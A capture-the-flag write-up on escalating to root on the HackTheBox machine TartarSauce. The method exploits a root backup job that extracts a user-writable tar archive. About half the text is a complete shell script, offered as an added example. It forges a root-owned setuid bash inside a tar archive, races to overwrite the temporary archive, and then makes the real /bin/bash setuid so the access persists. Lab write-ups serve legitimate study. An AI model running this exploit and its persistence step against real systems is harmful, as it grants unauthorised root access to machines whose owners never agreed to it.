TartarSauce HTB privesc

n00🔑
Aug 1, 2021

If we can control a tar archive that root later extracts, we can escalate our privileges. Let's see this in action.

We start as the onuma user.

The LinPEAS enumeration script flagged an unusual systemd timer.

backuperer.timer runs backuperer.service

The service runs a bash script every 5 minutes.

I downloaded the script and added comments to it for better understanding.

  1. At line 36 a backup of /var/www/html is created and archived into a file with a random name in /var/tmp. Because of the trailing &, this tar process runs in the background, and, most importantly, it runs as our user onuma. That is what makes the attack possible: the temporary archive is owned by onuma, so we can overwrite it with our own malicious .tar.gz before root gets to it.
  2. At line 52 this archive is extracted, and the extraction runs as root.
  3. At line 53 the integrity_chk() function runs; all it does is a recursive diff (diff -r) between /var/www/html and the freshly extracted copy, to check whether anything differs.

Let's understand this with the example below:

if [[ $(diff -r /tmp/tester /root/Desktop/tester) ]]; then echo "Success, files/folders are changed/different"; else echo "FAIL, files/folders are same"; fi

If there is a difference, the command prints Success, meaning the two directory trees differ; otherwise it prints FAIL. Note that the test only checks whether diff produced any output at all, so a single extra file is enough to flip the result.

Let's look at these directories:

Both /root/Desktop/tester and /tmp/temp have a ps folder, whereas /tmp/tester is empty; that is why diff outputs Success.

4. If integrity_chk fails (no difference found) the script removes the temporary extracted files. We do not want that to happen, because our malicious archive would be extracted and then cleaned up straight away. Since our archive contains a bash binary that does not exist under /var/www/html, the diff will report a difference and the extracted files are left in place.

5. Let's create a malicious archive and swap it in for the temporary one.

a) I transferred /bin/bash from the target machine to my local system and set the setuid bit on it. Once backuperer.service extracts it as root, running it with bash -p gives a root shell, because -p stops bash from dropping the effective uid back to the real uid. TartarSauce is a 32-bit machine, so a 32-bit bash binary was required; taking the target's own /bin/bash guarantees it matches the architecture and libc.

b) Creating the malicious archive. tar archives record each member's uid, gid and mode bits, and GNU tar run as root restores them by default on extraction; that is why this gives us a privesc. The caveat is that the member inside the archive must already be root-owned with the setuid bit set (create it as root locally, or rewrite the metadata when building the archive); a setuid bash owned by a non-root user is useless. Keep the var/www/html layout so the extracted tree mirrors what the script expects.

mkdir -p var/www/html
cp bash_32_bit var/www/html
tar -zcvf suid_bash.tar.gz var

c) Replace the temporary archive in /var/tmp with our suid_bash.tar.gz as soon as it is written. It is owned by onuma, so we can overwrite it; the script only knows the path, so when root extracts it, our contents come out.

6. Persistence with root:

From the root shell obtained via the extracted setuid bash, set the setuid bit on the real /bin/bash as well (chmod u+s /bin/bash), because the extracted copy under /var/tmp is removed when backuperer.service runs again 5 minutes later.
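The whole procedure from steps 5 and 6 in one script, as an added example and not the original post's commands. It assumes GNU tar and GNU find on both boxes, that the backup script writes its temporary archive directly into the directory given as TMP_DIR (/var/tmp in the post) as the invoking user, and that root's extraction lands somewhere below that same directory; the function names and paths are mine. Setting --owner/--group/--mode at archive-creation time means no local root and no cp -p are needed to get a root-owned setuid member.

```shell
#!/bin/bash
# Added example, not the original post's commands. Builds the malicious archive,
# swaps it over the onuma-owned temporary archive, waits for root's extraction,
# and then makes the real /bin/bash setuid from the resulting root shell.
# Assumptions (mine, not from the post): GNU tar and GNU find are available; the
# backup script writes its temporary archive directly into TMP_DIR (/var/tmp in
# the post) as the invoking user, and root extracts it somewhere below TMP_DIR.
set -u

# build_archive SRC_BASH OUT_TGZ
# --owner/--group/--mode rewrite the member's metadata inside the archive, so
# this runs unprivileged. GNU tar run as root applies --same-owner and -p by
# default on extraction, so the member lands on disk as root:root 4755.
build_archive() {
  local src="$1" out="$2" work
  work=$(mktemp -d) || return 1
  mkdir -p "$work/var/www/html" || return 1
  cp "$src" "$work/var/www/html/bash" || return 1
  tar --owner=root --group=root --mode=4755 -zcf "$out" -C "$work" var/www/html/bash || return 1
  rm -rf "$work"
}

# verify_archive OUT_TGZ: succeeds only if the member is root-owned and setuid.
verify_archive() {
  tar -tzvf "$1" | grep -q '^-rwsr-xr-x root/root .* var/www/html/bash$'
}

# swap_archive TMP_DIR PAYLOAD_TGZ [TIMEOUT_S]
# Polls for a regular file we own that appeared after the payload was built,
# waits until its size stops growing (tar may still be writing it), then copies
# the payload over it in place. cp keeps the original name and ownership; the
# script only remembers the path, so root extracts our content.
swap_archive() {
  local dir="$1" payload="$2" timeout="${3:-600}" deadline f s1 s2
  deadline=$(( $(date +%s) + timeout ))
  while [ "$(date +%s)" -lt "$deadline" ]; do
    f=$(find "$dir" -maxdepth 1 -type f -user "$(id -un)" -newer "$payload" \
          ! -samefile "$payload" -print -quit 2>/dev/null)
    if [ -n "$f" ]; then
      s1=$(wc -c < "$f"); sleep 2; s2=$(wc -c < "$f")
      if [ "$s1" = "$s2" ]; then
        cp "$payload" "$f" && printf 'replaced %s\n' "$f" && return 0
      fi
      continue
    fi
    sleep 1
  done
  return 1
}

# wait_for_suid TMP_DIR [TIMEOUT_S]: prints the path of a root-owned setuid
# bash once root has extracted the archive somewhere below TMP_DIR.
wait_for_suid() {
  local dir="$1" timeout="${2:-120}" deadline p
  deadline=$(( $(date +%s) + timeout ))
  while [ "$(date +%s)" -lt "$deadline" ]; do
    p=$(find "$dir" -type f -name bash -user root -perm -4000 -print -quit 2>/dev/null)
    [ -n "$p" ] && { printf '%s\n' "$p"; return 0; }
    sleep 1
  done
  return 1
}

main() {
  local src="$1" payload="$2" tmpdir="$3" suid
  build_archive "$src" "$payload" && verify_archive "$payload" \
    || { echo 'archive build/verification failed' >&2; return 1; }
  swap_archive "$tmpdir" "$payload" || { echo 'no temporary archive appeared' >&2; return 1; }
  suid=$(wait_for_suid "$tmpdir") || { echo 'extraction produced no setuid bash' >&2; return 1; }
  # -p keeps the effective uid 0; setuid the real /bin/bash so the access
  # survives the next cleanup run of the timer, then drop into a root shell.
  "$suid" -p -c 'chmod u+s /bin/bash && id'
  /bin/bash -p
}

# Usage on the target, as onuma (paths illustrative):
#   ./privesc.sh /bin/bash /dev/shm/suid_bash.tar.gz /var/tmp
if [ $# -eq 3 ]; then main "$@"; fi
```

verify_archive is the check worth running before touching the target: if the listing does not show -rwsr-xr-x root/root, root will extract a setuid binary owned by the wrong user and the whole chain silently fails.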

Thanks for reading!


Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)
